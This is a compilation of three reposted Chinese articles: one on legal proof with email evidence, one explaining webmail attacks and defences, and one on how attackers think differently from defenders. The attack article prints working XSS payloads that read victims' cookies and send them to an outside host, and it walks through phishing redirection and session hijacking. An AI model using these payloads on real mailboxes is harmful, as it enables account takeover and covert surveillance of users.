  在訴訟中,如果當事人對電子郵件的收發人發生爭議,在此種情況下,審查電子郵件的內容已無意義,因當事人如否認是電子郵件的收發人,實際上已經否認了電子郵件的內容。其最為典型的案例是發生在某大學的一名學生以另一學生的名義,發出了一封回絕那名學生受到留學邀請的電子郵件,致使那名學生失去了留學的機會。該案在審理中,被告人否認自己發出了這樣一封電子郵件,而法庭主要是採用排除法來確認是否為被告人所為。很明顯,在這裏被告人否認自己是電子郵件的發件人比否認所發電子郵件的內容更為對自己有利。該案雖然最終以庭外調解結案,但如果雙方未能和解,以排除法的結論來作為確認被告人侵權的證據是否充分,則值得商榷。以筆者的看法,在確認電子郵件的收發件人時,首先需查清的是電子郵件的位址是否是收發件人的,其是否擁有合法的用戶名、帳號、密碼等,因每一個註冊用戶均對應一個電子郵件信箱,合法用戶的上述資料及個人資料(真實姓名、工作單位、通信地址、身份號碼等)在“ISP” (Internet service provider 即網路服務提供商)處均有備案,如使用人的個人資料於ISP的備案一致,則可以確認該信箱是使用人的,在該用戶的信箱密碼未被他人盜用的情況下,以該信箱收發的電子郵件的作者即為信箱的擁有者。筆者曾遇一案,當事人否認自己給對方發出過財產情況的電子郵件,後經核對該電子郵件位址的ISP備案,與該當事人的情況一致,法庭據此確認該電子郵件的內容,並做出判決,結案後該當事人服判。

  當前,由於某種原因,有些信箱成為公用信箱,使用該類信箱的非註冊用戶,則無權要求獲得法律上的保護。對開放自己的電子郵件信箱者,無異於等於放棄自己的權利。當然,電腦“駭客”的侵襲或惡意的發送匿名電子郵件則另當別論。

  2、電子合同收到與合同成立地點認定

  "收到"這一概念,在電子商務貿易過程中,具有相當重要的法律意義。國際貨物銷售公約和大陸法規定,不論是發盤還是接受,均以抵達接收人或發盤人作為生效的條件之一。而英美法則規定,信件或電報一經發出,立即生效,生效的時間以投遞郵件收據上郵局所蓋郵戳為准,而不管對方是否收到。在電子商務環境中,為避免貿易糾紛,確定了"收到生效"的原則,也就是說,不論什麼傳遞,只有在被對方適當地收到了,才具有法律意義。這就要求傳遞的單據必須能夠進入對方在合同中指定的接收電腦。同時,在電子商務環境中,對收到的定義也作了嚴格的規定,即當傳遞進入到接收方的接收電腦時,即為收到,不管接受方有沒有檢查傳遞的內容。反之,在能進入指定的接受方的接收電腦之前,沒有一份單據被認為是適當地接收了,也沒有一份單據會產生法律上的義務。這與以紙張為基礎的貿易環境中的情況是相一致的。

  我國新《合同法》規定:"採用資料電文形式訂立合同,收件人指定特定系統接收資料電文的,該資料電文進入該特定系統的時間,視為到達時間;未指定特定系統的,該資料電文進入收件人的任何系統的首次時間,視為到達時間(第十六條)".該法同時規定,"採用資料電文形式訂立合同的,收件人的主營業地為合同成立的地點;沒有主營業地的,其經常居住地為合同成立的地點(第三十四條)。

  3.對電子郵件內容的認定

  電子郵件的內容,亦是在訴訟中不易認定的部分。在確定了收發件人後,就要對電子郵件的內容進行審查,之所以這樣,是因為手書的信件,有“原件”與“影本”之分,不易做假。因而電子郵件中,似乎已無“原件”與“影本”之分,因電子郵件的內容是必須借助於電腦為載體才能呈現,離開了這一載體,即為電腦列印件。故以審查書證的傳統審查方法進行審查,在此已不可行。因對這類證據的審查主要是審查其是否為原件,是否有本人簽字,是否蓋有公章。對境外的函件還需有公證、認證。

  但對電子郵件來說,所有這些審查方法均不可行,因電子郵件的傳輸方式已決定了電子郵件不具備上述特點。如仍以該種方法審查電子郵件,無異於將電子郵件排除在證據之外。當然,對於一般人員來說,直接在Internet mail的收件箱中刪改純電子郵件信件亦非易事,因收件箱中的電子郵件是唯讀檔案,拒絕刪改。其另存方式也只是改變檔的位置,檔的屬性並未改變,仍是。 eml文件。從外觀上看,純電子郵件信件的信頭上均帶有收發件人、收發件人的網址、收發件時間等詳細資料。故對這類檔只要上述資訊清楚,以筆者見,可以作為證據認定,如還有疑問,可要求當事人將電子郵件“轉發”至承辦人指定的電腦上或乾脆通過“連機”、“共用”的方式直接到舉證人的電腦上查閱原始資訊(雖目前法院在設備上尚不能滿足)。可能發生的刪改一般是隨電子郵件以“插入”“附件”方式發送的MIME非文字檔案,如Word、Excel、gif、 mpg檔乃至聲音、影像等多媒體檔,因該類檔的打開是在相應的編輯軟體下進行,故可以刪改。該類檔的電腦列印件,與普通電腦列印出的檔無異。故僅憑列印件很難起到證據的作用。

  此外,另有一類電子郵件是被收發件人從其電腦中永遠刪除了,並據此否認收發過電子郵件。對此類情況目前尚無較好的辦法。從技術上講,已可以做到將所有“網上資訊”搜集起來並永久保存,在必要時,通過檢索使其還原。由於我國目前尚無要求網路服務商對傳輸的電子檔儲存記錄或轉存的制度,造成了一旦發生爭議,將無第三方可出具中立性的證據。而部分地方法規已有了相應規定。如《廣東省對外貿易實施電子資料交換暫行規定》就規定:電子資料服務中心應有收到報文和被提取報文的回應和記錄;電子報文的存貯期最短不得少於5年;對進行電子資料交換的協定雙方發生爭議時,以該中心提供的資訊為准。如該方法被用於司法實踐,將給審判工作帶來極大便利。

  三、 合法舉證問題

  在通常訴訟過程中,誰主張,誰舉證。但無紙化電子郵件交易中,舉證是個難題,證據不好保存,也不便提取原告對於其主張的事實即卻沒有任何證據。因原告無法舉證證明其主張的權利或法律事實令其承擔敗訴的風險,這是不公平的。如果要求被告承擔舉證責任,存在原告是否受到侵害尚不明確,且不談受害的原因系電子簽名(密碼)被冒用,或因網路系統的不安全隱患所致,如何舉證才合法呢?筆者認為;

  1. 由當事人將郵件列印出來作為證據提交,其可信度較低,而且以Attach方式發送的非txt純文字檔案和Html檔,有時還不能隨原郵件一塊列印出來,需在其他專用軟體中列印,而在專用軟體中一般都有對原文件進行更改的功能。

  2.在訴訟之前,當事人可以請公證機關作出公證文書,也可以採取律師見證、外交機構認證、工商行政管理部門鑒證以及利用先進的電子設備製成視聽資料等方式保存證據,或者申請人民法院採取訴前證據保全。

  取證的方式,最好以查看源代碼並Coyy出所有內容粘貼到文字處理軟體中編輯並列印,這樣能夠取得郵件中的所有內容;附件中的內容,應根據不同的檔格式,盡可能不失真地用高檔設備列印出來;如是音效檔案的,可記錄成文字後列印出來,並保留原音效檔案便於將來庭審中質證。

  3.在訴訟中,當事人可以將導出的郵件放在軟碟中提交人民法院,經對方質證後無異議的,可列印出來經雙方當事人簽字後附卷。如對方有異議,應由人民法院按現場勘驗的方法取證,現場勘驗的筆錄應由雙方當事人當場簽字。另外,當事人只提交列印稿,而原件已從電腦中永久刪除的,除非對方承認,否則無論對方是否有能力提出反證,該列印稿均不可作為定案的根據。因為此時無法判斷該檔是否就是原件,更不能因對方舉不出反證而確認該證據有效。

  4.認證機構在網路化的商事交易中處於樞紐地位,其義務之設定與履行,關係到電子商行業的成敗。認證機構具有安全、真實、及時、公開、謹慎、保密等方面功能。因此,從認證機構出具的證據真實有效。

  目前,雖然我國尚無完整規範Internet、E-mail的法規,Internet的普及程度亦無法與發達國家相比,司法機關的設備尚無法滿足審理此類糾紛的物質需要。但是,Internet、E-mail所帶來的法律問題卻已實實在在地擺在了我們的面前。電子證據的法規與其他法規相比,需要電子等方面的專業知識比較多,這就給立法、司法提出了更高的要求。國外的Internet的發展和普及,已使國外有了相對完善的電腦法律。因此我們應借鑒國外電腦法律,根據我國的實際情況,借助專業人士的幫助,來制定並完善我國的電子證據法律。電子證據法律必將成為網路時代的又一護航者。



轉自 賽迪網

防禦郵箱間諜



如果說中國走在網絡戰爭的前沿,你可能覺得胡扯。發動網絡戰爭並不復雜,一般有三種類型:攻擊基礎設施、竊取機密數據、癱瘓網絡服務。而本文,將重點談及中國竊取機密數據的郵箱情報攻擊,幾乎從來沒有哪個國家能 像中國因維穩不惜任何代價而秘密地監聽國內外的敏感人士。

對於電子郵箱攻擊,你注意到國外媒體批露的中國攻擊事件與日俱增,如本月9號,紐約時報記者聲稱他們的郵箱被攻擊而 Twitter上的敏感人士開始越來越多的抱怨。你可能會質疑,有何事實數據可證明他們的郵箱確被攻擊?這是一個好問題,因為他們無法跟踪攻擊來 源與防禦被攻擊,那麼,常見的攻擊手法是怎樣的?我們如何跟踪攻擊來源?又如何防禦郵箱間諜的攻擊?

一、你是局外人?還是受害者?

1月,Google向中國提出沒有審查機 制的G.cn,並聲稱有人試圖入侵中國維權人士的Gmail,14日,McAfee就IE 0day的分析,將此次大規模的竊取機密數據(知識產權)攻擊稱為極光行動。儘管Google事件餘波已去,我想說的是:極光行動為什麼沒有攻擊國內郵 箱? ——顯然!國內的郵箱具有過濾審查機制,這 可以解釋你的郵箱為何會丟信,更重要的是,一紙紅 頭文件可未經用戶許可洩露郵件數據,若有不從,以涉黃之名拔網線威脅。
普通的用戶會這樣認為:我不是敏感人士,我不會遭到電郵攻擊。這樣的想法很美好,讓我們談談"話語權"吧。在三皇五帝的古代,罵皇帝是要砍頭,而40年代末的建 國期,是紅色的革命語,時間回溯現在的極 權主義國家,一切已然不一樣了,儘管今天的新聞媒體仍在中宣部的約束之下,但互聯網是一次革命,這個開放的網絡空間,人人都是媒體,可在 Twitter報導新聞,可用Wordpress發出聲音,意識形態的大軍是無法擊潰互聯網。
你會不會遭到電郵攻擊?與你是不是敏感人士無關,而是視乎你在網絡空間的聲音、行為,以及現實生活中身份有關係。也不能說所有的電郵攻擊都與政府脫 不了乾系,更有那些充滿好奇心、樂於惡作劇的駭客。

二、攻擊手法

你的Yahoo郵箱沒有點擊任何鏈接,但攻擊者無需密碼便控制住你的郵箱,這是什麼回 事?你的Gmail密碼相當複雜,但為何收到密碼重置的郵件?你登陸網易郵箱,點開郵件即重定向登陸入口,但網址卻是真實的,這是為何?最後,來 自國外越來越多的電郵失竊的新聞越來越多,你仍質疑中國沒有能力侵入他國政要郵箱賬戶?

1、XSS釣魚

這種攻擊仍是目前最行之有效的方法,除了Gmail目前不存在XSS漏洞外,其它的Yahoo、Hotmail、網易、騰訊、搜狐、新浪等都存在 XSS漏洞。 XSS漏洞是啥?它的全稱是Cross-site scripting,即跨站攻擊,存在此漏洞的網站,能夠被惡意攻擊者劫持,它還派生了XSRF等等形式的利用,可謂Web木馬。
08年,國內的郵箱都存在HTML標籤跨站,漏洞都很弱智,比如<img src=javascript:alert()>插在郵件標題、郵件內容、郵件附件處即可彈出一個可愛的 alert。接下來,進步一點了,還是以HTML標籤為主,搞個數據包工具看哪個變量沒過濾、以及編碼轉換。 09年,又升級了,主要是國外的郵箱Gmail、Yahoo、Hotmail改以語法過濾,能利用的是CSS標籤跨站,Gmail非常狠,除了早期存在 Google Docs附件跨站攻擊,基本把惡意代碼過濾得慘不忍睹。 Yahoo在09年亦漏洞不斷,但很負責,隔三差五地不斷升級,而Hotmail令人失望,居然1day過了一年都不補。
騰訊圈了一批牛人,忘記是Ph4nt0m還 是80sec的,比其它的網易、搜狐、新浪的郵箱安全性好一點,搜狐與新浪最 爛,透露一下,它們其中一個仍存在字符集的跨站漏洞。那麼,XSS攻擊到底是怎樣的形式呢?用一個08年截獲的新浪的HTML標籤XSS漏洞說明,此漏洞 是失效了,這年頭基本沒人直接公開0day,都養家糊口來著。
<INPUT TYPE="IMAGE" SRC="jav ascript:x7s='var Then=new Date();Then.setTime(Then.getTime()+7200*1000);if(document.cookie. indexOf(\'Cookie1 =\') == -1){document.cookie=\'Cookie1=RAY;expires=\'+Then.toGMTString();window.parent.location.href=\'http://www.google.com /sina/index.php?url=\'+location.href+\'&c=\'+document.cookie.replace(/&/g,\'xxx\');}';eval(x7s)"); ">
此漏洞的形成在於新浪郵箱沒有過濾空格,即過濾了javascript,但稍變形為jav ascript,便使得其後的惡意代碼得以執行。這段代碼有兩個功能,獲取Cookie並延長有效時間,並用父窗口 windows.parent.location重定向至釣魚網站。完整的攻擊流程是,將上述XSS代碼插入至郵件內容,以HTML模式發送郵件至受害者 郵箱,受害者點開郵件時,會迅速轉向sina釣魚網站,而轉向過程中,因採用parent,轉向時,網址不會有變化,即不會顯示釣魚網址,而受害者在釣魚 網站輸入密碼提交之,釣魚網站截取密碼再轉回真實的郵箱,由於控制了Cookie,受害者因懷疑會再次點開那封攻擊郵件,但並不會再次跳轉,這令受害者產 生一種錯覺,它以為郵箱仍是安全的。

2、竊取Cookie

你可以理解為竊取會話。你有過很多這樣的經歷,使用賬戶登陸某個網站,如Youku.com,關閉瀏覽器,再次打開youku.com,則不需要輸 入密碼,這便是Cookie的作用。 為什麼會有Cookie呢?由於Http是無狀態協議,為了在各個會話傳遞信息,因而需要Cookie或Session來標記訪客者的狀態,這裡的 Session是瀏覽器的Cookie裡帶了一個Token來標記,而服務器取得Token檢查合性後便把服務器上存儲的對應狀態和瀏覽器綁定。總的意思 就是:我只要竊取你的Cookie並保持了Session不過期,便可無須密碼訪問你的電子郵箱內容。
如果你要查看自己的Cookie,給Firefox裝個HttpFox擴展即可,如下圖。

竊取Cookie很簡單,可將上面的Javascript稍加改裝即可:<INPUT TYPE="IMAGE" SRC="jav ascript:document.location='http://www.google.com/cookie/stealer.php? cookie='+document.cookie;">,然後在stealer.php寫個保存接收的Cookie記錄的代碼即可,如果你想讓 Session不過期,自己寫個工具搞惦,每隔30秒請求一次目的頁面。 09年,Yahoo就被一幫人折騰了很多郵箱,不知道修復了沒有,國內幾個郵箱也能被利用。

3、惡意軟件

即木馬、病毒、後門、間諜、鍵盤記錄器……這些軟件,最常見算是doc、pdf病毒了,好好的一個文檔,挾帶了木馬,雙擊一打開,你就完了。最容易 受到攻擊的是西藏人士、維權人士,然而,我不得不承認,這是一種非常陰險的手段,因為這毫無任何技術含量。這個攻擊流程是,xxx部門獲取經費收購或買斷 木馬軟件、捆綁軟件,一般外包給中國公司,然後這些公司的報價奇高,各省xxx部門買了後,按照說明書配置木馬上線,再用捆綁工具與可信的文件捆在一起, 再用Google挑目標,比如找到abc.com網站,將該網站電子郵箱地址都整理出來,再用郵箱批量群發器不管三七十一把這些病毒通通發過去,再泡上一 杯茶盯著木馬軟件等著目標上線。
這種沒有採用魚叉式攻擊所導致的後果是,買的木馬軟件、捆綁軟件很快就無效了,因為一頓亂發,被安全軟件給盯上或用戶舉報查殺掉了,這個例證就是最近的IE 0day及PDF 0day很快曝光,估計這前後都不到一年。而在前文,儘管中國沒有比美國更好的網絡戰爭實力,但是不差錢,他們不需要關注技術細節,只需要知道誰 有0day,誰會挖掘0day,然後招安,買斷一堆的0day,比如Discuz!、Wordpress、Firefox漏洞,照著教程去攻擊。
那麼如何防禦這種惡意附件的攻擊?當你再次在郵箱看見一堆的PDF、DOC、HTM壓縮包時,簡單的方法是,下載後不要打開,直接上傳至 Google Docs,要是顯示一片空白或無關的內容,不管三七二十一提交到VirusTotal網站上。

4、社會工程學

這個方法很簡單,先跟你套近乎下,然後東問問西問問獲得碎片信息,基本就是掘地三層把目標的信息全收集起來,完了後,評估一下你的弱點在哪裡,再從 弱點入手,這種攻擊通常是僱傭了職業黑客來完成,因為過程比較複雜。舉例子,攻擊者有目標的郵箱,然後放到Google搜索,看目標註冊了哪些網站,把這 些網站整理,逐個把這些網站入侵了並下載數據庫,從中找到目標的網站密碼,再用網站密碼試郵箱密碼,要是目標只用一個密碼,那麼他的郵箱就完了。
總體上來說,你在網絡上的信息越少,便能夠降低被入侵的威脅。但事實並不情人願,Web2.0的社交網絡流行,你註冊了Twitter,天天嘰嘰喳 喳,一不小心把家世、住址、約會全都洩露了,你註冊了豆瓣,天天左看右瞧還加了攻擊者為好友,結果,他就知道你上網習慣與興趣愛好,然後再用策略和你聊的 特別歡,某一天,他跟你講:我找到一個非常牛B的電影了,你在Verycd下載瞧瞧。你一看,還真不錯,真是你喜歡的。然後他又講,能不能幫我登陸下 Gmail下載個文件看看是啥內容?我網速比較慢,我發你登陸密碼。你聽了,這小忙是得幫的,馬上速度登陸對方的Gmail下載了壓縮包,結果打開壓縮包 的文檔發現啥都沒,到了第二天,你就很神奇地發現,哦哦~我的豆瓣、twitter全都登陸不了……
社會工程學攻擊永不過時,因為人人都有被利用的心理弱點,不管是好心、私心、同情心啥的,都無法避免這種攻擊。不過,這項攻擊最大的缺點是,很耗時 間,短則幾天,長則幾月。這項攻擊在敏感人士的社區很常見,如Forum、Google Groups等,那些攻擊者最常見的手法盜用可信賬戶發送病毒附件。

5、MIT中間人攻擊

以ARP攻擊為例,A訪問mail.sina.com,但攻擊者B通過ARP劫持,可以使得你訪問虛假的新浪釣魚網站,而非真實的新浪。這種劫持通 信的手法可適合不同的場合,如劫持ADSL線路,這需要紅頭文件請本地電信局協助的,然後修改你的數據包返回假的數據包,舉例而言,你想從QQ官方下載 QQ程序,攻擊者修改數據包把QQ程序的下載地址改成木馬地址,結果你就可以下載個木馬回去了。如果你的通信是明文,沒有採用SSL,攻擊者可以直接看到 你密碼。不過,我不太肯定,Gmail雖然採用了SSL,但用戶名與密碼卻在網址中出現,有公司宣稱能解開SSL,我現在仍然是半信半疑。
另外一種是hosts文件劫持,典型的例子是,某個傢伙在Twitter.com說:無法訪問youtube.com? Picasaweb?很簡單,修改hosts文件即可馬上訪問。你一聽,哇,這麼好,趕緊用記事本打開hosts文件,把對方提供的映射地址粘貼進去,再 重新打開youtube.com,哇,真神奇,打開了~~聰明的看客接下來知道會發生啥了。
對於ADSL線路劫持的手法,這種攻擊也是行之有效的。另外,我們也得對某些代理軟件保持警惕,天知道那些免費的socks5、vpn會幹出令人震 驚的事嗎?

6、暴力破解

有三種,web窮舉、smtp窮舉、雲窮舉。在多數的情況下,前兩種效率低下,且限制諸多,以Web Gmail為例,它有CAPTCHA限制、重複次數的限制,不過,我倒是碰到過一個Python版的窮舉工具,但速度很慢。至於smtp,如果服務器做了 限制的話,比如現在網易對溯雪暴力破解工具是免疫 的。雲窮舉,就我目前所知,我想這是最有效率的破解方法,已 有安全專家Electric Alchemy利用亞馬遜雲服務Amazon Ec2運行Elcomsoft工具暴力破解PGP ZIP檔案的例子。 憑藉雲計算的超級計算機,以及一個分佈式郵箱密碼破解工具,暴力破解的速度將更快速。不過,這並不切實際,因為破解的成本太高了,需要很多米米。
暴力破解,這個古老的方法在目前只能針對極少的主流電子郵箱,儘管如此,但它對那些自架設的電子郵局仍然有效,因為它們沒有CAPTCHA、重複嘗 試次數、服務器資源等限制。總的來說,暴力破解對本地的加密文件破解比較有效率,但對網絡郵箱賬戶的破解尚不能達到30%的成功率。

7、瀏覽器惡意腳本

上過流氓軟件的當吧?一旦打開IE,主頁被鎖定只能訪問某個流氓的網站,嗯,沒錯,瀏 覽器的腳本也能起到釣魚攻擊之用。比如IE的BHO(Browser Helper Object)劫持、Chrome、Firefox擴展釣魚。就目前而言Chrome、Firefox的擴展釣魚並不怎麼流行,這比較麻煩,攻擊者需寫一 個看似合法可信的擴展,並植入後門,還需要方法讓目標安裝,這費力不討好,但BHO容易多了,可以隱秘地安裝而不會有提示。要防禦這種攻擊很簡單,檢視你 的Firefox、chrome是否有陌生的擴展、插件,不要在第三方的網站安裝擴展。

8、內嵌登陸表單

這是社會工程學攻擊的一種變形。當你打開某郵件,其內容部分嵌入了登陸表單,具體就是,你會看到一個要求你輸入用戶名、密碼的登陸框。恰好RFA的 新聞《維 權人士郵箱和推特遭竊取、攻擊》公佈一張攻擊實例圖片,見下圖。

如果你的Gmail收到上述的威脅恫嚇郵件,不要擔心,請在郵件的右側點擊下拉菜單,選擇“這是網絡欺詐”,而Gmail將會稍後封鎖此攻擊者。普 通的用戶不要誤以為這是Gmail的安全漏洞,最簡單的方法,選中郵件內容查看源代碼,你可以發現並不存在惡意的Javascript腳本,而是HTML 標籤,你在源代碼找到Action位置,將其後的釣魚網站向Google舉報即可。
其它的Gmail用戶不需要擔心,這種內嵌表單釣魚方式是通殺Gmail、Hotmail、Yahoo、網易、騰訊、搜狐的郵箱,由於不存在惡意的 Javascript,可稱之良性HTML標籤利用。看到這類威脅恫嚇郵件,一是舉報釣魚郵件、釣魚網址,二是刪除該郵件,三是提醒你的朋友警惕。

三、防禦

安全不能100%保證,只能最大限度地降低威脅,更來源於用戶的安全意識。

1、防禦XSS

如果你使用的Firefox瀏覽器,可安裝NoScript擴展來屏蔽惡意的Javascript腳本。但你希望一勞 永逸的話,非常簡單,註冊一個私人Google Groups, 並設置Gmail的過濾器,所有郵件一律轉發至Google Groups。但如果也不喜歡註冊Google Groups,那麼你可以再註冊Yahoo、Hotmail郵箱,使用Yahoo收取Gmail,再用Hotmail收取Yahoo,在這過程中,特定的 XSS代碼會分崩離析。

2、防禦惡意軟件

.txt文本格式永遠是無害的(如果你的系統沒有被映像劫持)。儘管如此,但我們仍難 以避免地與.DOC、.PDF格式打交道,如果你使用的Gmail,那麼一律在線查看。而另一種可能是,你會收到RAR、7z等壓縮格式,而郵件內容也頗 具引誘性,那麼你下載之後,請右鍵解壓至單獨的文件夾,而你不認識發件人並有疑心時,永不要馬上打開,請上傳至Google Docs在線查看,或者提交到VirusTotal.com在 線查毒。最好也在郵箱的簽名行增加一行文字:我只接受.txt格式附件!其它格式附件的郵件一律刪除。

3、防禦身份盜竊

建議啟用數字簽名。它可以協助你確認簽名者的身份及數據完整性,甚至你發出的郵件,對 方能夠獲得確認,從而避免被第三方攻擊者的濫用。與此同時,雙方還可以明文約定,即在準確的時間範圍內容髮送郵件,如一般為每個星期日發送郵件,而未在此 時間範圍內的郵件而作廢。

4、防禦數據失竊

正如前文所提,你應該使用TrueCrypt加密附件。這款經典的加密工具備受讚譽,你應該保持經常 使用的習慣。

5、防禦身份洩密

你的密碼提示問題應該是模棱兩可,比如“天下有多少顆月亮?”。而在個人註冊信息處, 不要留下你真實家庭地址、身份證號、電話號碼、出生日期等信息,當你的郵箱被攻破,這些信息能夠證明你的身份。不要將這些信息設置為公開,而是保密,並阻 止在Google Profiles可見。

6、使用Chrome瀏覽器

在TippingPoint第三屆Pwn2Own黑客大會,Apple's Safari, Mozilla's Firefox和Microsoft's Internet Explorer 8全部陣亡,你應該接納黑客們的建議,使用Chrome瀏覽器,我不能保證Chrome會一直安全的,因為安全是個偽命題,就目前而言,Chrome是個 不錯的選擇。當然,下一屆的Pwn2Own王者可能會是Firefox,不管如何,IE不是個好選擇,因為中國的黑客正在折騰它。

7、使用Gmail

在我長達半年的測試,我仍然無法拿下Gmail,它太安全了,這使我鬱火,當然,我也 不能保證它也是最安全的,至少目前我沒有聽到Gmail存在安全漏洞的消息。

8、每月密碼老化

微軟聲稱,定期改密碼沒有用,只會浪費時間與金錢。 我反對這種說法,當然,他們的調查結果是針對美國企業。我的建議是,密碼請設置為12位,每月更改電子郵箱密碼。間諜與黑客不一樣,間諜才不會愚蠢地刪除 你的郵件並更改你的密碼,那不可能,他們會暗中的監視你的郵件來往情況,伺機獲得可起訴的把柄。

四、反跟踪

在你尚未成為他人的魚之前,先搞翻這位漁人。

1、阻止郵件中的媒體

如果你不想攻擊者獲取到你的IP地址、瀏覽器、操作系統等信息,你應該阻止郵件中圖片顯示。這是為什麼?顯示圖片則意味著你訪問了該圖片的服務器, 而該服務器則記錄了你的訪問數據。如果你已經安裝了IIS、Apache,那麼你可以打開http://localhost,再去查看它們的日誌信息,看 看到底有沒有記錄你的訪問信息。
而如果你沒有裝上IIS、Apache無法測試的話,你可以打開間諜豬:http://www.spypig.com/ 向自己的郵箱發送測試郵件。如果你使用的Gmail,那非常好,Gmail默認是阻止圖片顯示的。

2、跟踪發件人的來源

如果你用的Foxmail客戶端,那很簡單:郵件——郵件信息——原始信息,即可看到 發件人的IP地址。如果你使用的Gmail,你可以在郵件的右側點擊三角形的下拉框,選擇Show Original查看郵件頭,要是看的頭暈,可直接找"Received"那一行,將其後的IP地址放到www.myip.cn進行查詢,以確認發件人來自哪裡。

3、質詢

陌生人可能發送熱點事件的郵件,諸如玉樹地震死亡名單,維權人士名單,他試圖激起你的 好奇心以及人道主義、愛心等。你不應該馬上查看,而是澄清你的疑問,這份名單的出處來自哪裡?你為什麼擁有這份名單?你發送給我的理由是什麼?要是對方無 法消除你的疑問以及無回复,我建議你將這封郵件的附件下載,交提交到VirusTotal上報病毒。

4、搜索

搜索對方的郵箱地址,看看在互聯網是否有跡可尋。如果你使用Gmail,可在郵件中點 擊“Show details”看看此封郵件是否為群發郵件,如果是,直接回复所有人詢問:這封郵件帶有病毒嗎?

5、檢查過濾器

現在登陸你的Gmail,進入設置項,選擇“Filters” 標籤,檢查是否存可疑的郵箱地址,如果有,請迅速刪除,否則,你的郵件全被偷了。

五、反思

從陸戰、水戰、空戰、網戰、太空戰,全球各國都在試圖提升各個空間作戰實力,顯然,在 網戰這塊,中國是大小通吃,吃完之後還堅決反對沒吃。以Google事件為例,華爾街日報昨天的報導《谷歌攻 擊者獲得用戶識別軟件代碼》,提及攻擊者使用了谷歌工程師的工作站作為跳板,儘管我不能核實其真實性,但在《挑戰五毛黨》這篇分析文也提及 Google中國區被安插內鬼。接下來,北京政府將如何應對Google後續事件呢?吃?抑或沒吃呢?




本文轉自 可能吧

駭客想得和你不一樣!

轉自 roamer

上週五在一個場合中,

被某單位長官問到:「為什麼這麼多單位通過了資安認證後,卻還是被黑得很慘。」
我當下的回答是:
「管理者與 技術人員常站在各自的角度去思考如何有解決問題,
在資安管理與資安技術上,往往各做各的,
無法有效的銜接,也因此產生了許多被忽略的 gap(間隙),
造成表面上看起來該做的都有做了,
但還是不斷被駭客給入侵的事實。」

事實上,除了上述回應外,
還 有一個很重要的觀點,
就是多數資安人員並沒有嘗試從駭客角度去思考,
而是從過去所受的正統教育方式去做正向思考的防禦,
而忽略了 其實~「駭客想得跟你不一樣」!

由於之前在一些場合也曾經分享過相關的內容,
所以趁著今天宅在家看道奇台灣第三戰的時候,
順 便整理一下並分享出來好了。


首先,駭客跟一般防守者最大的差異在於心態上的不同,
攻擊者的態度通常較為積極,
除 了訂閱一堆弱點通報與安全資訊外,
每天還會主動上各大駭客網站蒐集弱點資訊;
常常連到一個網站或使用某項功能時,
也會手癢地去稍 微測試一下。

而防守者呢?
不要說是每天蒐集資訊了!
我們可以看到一般企業的IT人員,
每個月微軟定時更新時,
就 開始在Plurk或其他社交網站上發表一堆的抱怨文,
每個月更新一次都嫌懶了,
難怪資訊更新的老是比攻擊者還慢!

除此之 外,
很多主事者不把資安當一回事也是造成這種心態差異的一個重要原因。
企業主:我每秒鐘幾十萬上下的,誰有那個閒功夫跟你搞資安。

這類型主事者常會誤以為 自己所雇用的IT人員,
就跟葉問一樣可以一個頂十個,

而希望他在執行系統管理、網路管理與系統開發等任務時,
順便肩負起資安的重責大任!

但資安畢竟是 個專業且複雜的領域,
就過去經驗而言,
這種忽視專業分工的下場,
往往會比較偏近於廖師父。


「攻擊者積極,防守者消極」的心態差異,
往往是造成攻擊者佔上風的主要原因。

一個明顯的 案例是「個資法」的推行,
雖然個資法尚未通過,
但其實可以看到好幾種因應個資法通過的地下經濟已經蠢蠢欲動,
甚至是已經開始運作 了!
但問過很多IT人員,
其實都還是抱持著「今年還不會過」的心態來因應個資法,
即便是資安廠商不斷push,多數企業仍是「以 不變應萬變」的心態來因應。
試想,一旦個資法通過,攻擊者已作好準備,
身為防守者的你,該如何抵擋呢?

第二,在資訊安全 理論中已經說到爛的木 桶理論也是一個問題點,
很多IT人員都聽過木 桶理論,但實際執行起來卻不是那麼一回事,
我們還是常可以在報章雜誌中看到部分單位在誇耀自己的某項防護機制有多安全,
但其他的 弱點還是存在阿?
駭客也沒必要這麼聽話地去針對你防護最強的地方發動攻擊吧!
站在攻擊的角度思考,
當然會選擇最脆弱的地方進行利 用阿!

每次看到新聞上出事的單位跳出來宣稱他們某項防護有多強大時,
其實我腦海中浮現的都是電影「少 林足球」中,
一邊喊著「我是金剛腿阿!」一邊被酒瓶砸頭的畫面。


最常見的這類型迷思,
大概 就是發生在SSL加密機制上了!
記得以前有個叫Secure web site的信賴標章,
其實這個信賴標章上面也很清楚地載明了他保證 的是
加密的資料傳輸與SSL識別資料已確認
不過卻 有好幾個單位的負責人員曾經這樣跟我說過:
「我們有Secure web site標章,所以網站很安全。」
事實上,SSL只保障了傳輸 過程中的連線不被竊聽與身份識別,
傳輸的兩個端點各自的安全性問題依舊存在著阿!

第三,風險的變遷
資訊安全風險會隨著時 間而改變,
過去被認定是安全的資訊環境,過了一段時間後也必須重新進行評估;
所以部分資安認證也都會要求一段時間後必須進行複評,
來 確保安全風險仍維持在可接受的範圍。

在電影九 品芝麻官中,
李公公曾質疑包龍星打算拿明朝的劍斬清朝的官?

電影賭神中,
高進先生 也證明了兩年前的過時產品是打不過上個月最新的西德科技。


遺憾的是,不少單位的防禦策略,
卻遠比這些電影中的搞笑橋段還不如,
誤把資安政策當成恆久不變的 定律,
老是沉浸在自己過時的防禦策略還不自知。

最常見的案例大概就是「防火牆的迷思」了!
在很多新聞事件中,都看到單位 的管理者或發言人,
對外駁斥遭入侵的事實並宣稱他們有防火牆,所以很安全?
(其實這也適用於木桶理論)

第四,商業邏輯問題
現 在網路太發達了,
幾乎所有交易都可以在網路上達成,
這個那個...(大 誤)
但很多功能在設計的流程中其實就已經發生了嚴重的邏輯問題,
即便在結案時做了許多嚴謹的安全防護,
但在整個運作的流程中本身 就存在了風險,
或是使用者可以透過合法的功能達到許多非法的目的!

像這類型的弱點,
是一般常用的自動化檢測方法所無法檢 測出的漏洞,
也因此常被不小心給忽略了,
但有經驗的攻擊者只要針對整個運作的流程做審視,
常常都能夠揪出一些潛藏的問題點。
部 分重要的金融機構與一些曾被媒體拿出來當指標的資安典範,
其實也曾存在過這類型問題,
只是有沒有被爆出來的差異罷了...(嘆)

第 五,未知弱點
其實這點對IT人員而言比較算是非戰之罪。
站在駭客的立場,發現一個新的攻擊手法或安全漏洞,
該不該公布常會是一個 難題。
公布的話可能是為了出名,或迫使廠商進行修補。
不公布的話,有可能是為了持續進行利用,
也可能是較正面的理由,
因 為弱點公布了,IT人員也不見得會馬上修,
但攻擊者一定會立刻嘗試進行利用!
